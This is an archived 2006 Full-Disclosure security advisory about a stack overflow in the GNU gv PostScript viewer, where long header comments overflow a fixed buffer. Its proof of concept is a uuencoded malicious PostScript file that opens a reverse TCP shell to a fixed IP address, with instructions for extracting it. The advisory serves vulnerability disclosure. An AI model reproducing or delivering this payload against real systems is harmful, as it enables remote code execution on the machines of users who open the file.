lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <45534F73.5010107@sysdream.com>
Date: Thu, 09 Nov 2006 16:55:31 +0100
From: Renaud Lifchitz <r.lifchitz@...dream.com>
To: full-disclosure@...ts.grok.org.uk
Subject: GNU gv Stack Overflow Vulnerability

GNU gv Stack Overflow Vulnerability


//----- Advisory


Program          : GNU gv
Homepage         : http://www.gnu.org/software/gv/
Tested version   : 3.6.2
Found by         : r.lifchitz at sysdream dot com
This advisory    : r.lifchitz at sysdream dot com
Discovery date   : 2006/11/06
Vendor notified  : 2006/11/09


//----- Application description


gv is a comfortable viewer of PostScript and PDF files for the X
Window System. It uses the ghostscript PostScript interpreter
and is based on the classic X front-end for gs, ghostview, which
it has replaced now.


//----- Description of vulnerability


The 'gv' viewer is prone to a remote stack overflow
vulnerability. This issue exists because the application fails
to perform proper boundary checks before copying user-supplied
data into process buffers. A remote attacker may execute arbitrary
code in the context of a user running the application. As a result,
the attacker can gain unauthorized access to the vulnerable computer.

This issue is present itself in the 'ps_gettext()' function residing
in the 'ps.c' file.

Long comments in some specific headers (such as '%%DocumentMedia:')
of PS files are unconditionally copied into 'text', a 257 character
buffer on the stack.

This issue is reported to affect gv 3.6.2, but earlier versions are
likely prone to this vulnerability as well. Applications using embedded
gv code may also be vulnerable.


//----- Proof Of Concept


* Linux IA32 Reverse TCP Shell on 192.168.110.247:4321 (uuencoded
exploit) :

begin 644 hello-reverseshell.ps
M)2%04RU!9&]B92TS+C`*)254:71L93H@:&5L;&\N<',*)25&;W(Z(%)E;F%U
M9"!,:69C:&ET>B`M(%-Y<V1R96%M("T@:'1T<#HO+W=W=RYS>7-D<F5A;2YC
M;VTO"B4E0F]U;F1I;F=";W@Z(#(T(#(T(#4X."`W-C@*)25$;V-U;65N=$UE
M9&EA.B"0D)"0D)"0D#')@^GNV>[9="3T6X%S$](GKN*#Z_SB]./\_:&!3:R(
MM'\G`Q^G/;MB&&-BFUY7N8A/;DJ\T,B*PL;MA(&N3U*T=_^Q6\;M+U)UQLW]
M5,:*_47'C%O$_+%;QA[I'Z>NXD%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04'OO`0(04%!(#8Q,B`W.3(@,"`H*2`H*0HE)41O8W5M96YT1&%T
M83H@...E86XW0FET"B4E3W)I96YT871I;VXZ($QA;F1S8V%P90HE)5!A9V5S
M.B`Q"B4E4&%G94]R9&5R.B!!<V-E;F0*)24K(&5N8V]D:6YG($E33RTX.#4Y
9+3%%;F-O9&EN9PHE)45N9$-O;6UE;G1S"@``
`
end


Use:
$ uudecode < this-advisory.txt
to extract the exploit.


//----- Solution


No known solution. You have to wait for a vendor upgrade and
be careful with unknown PS files.


//----- Impact


Successful exploitation leads to remote code execution.


//----- Credits


Renaud Lifchitz
r.lifchitz at sysdream dot com
http://www.sysdream.com/


//----- Greetings


Thanks to Ali Rahbar


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ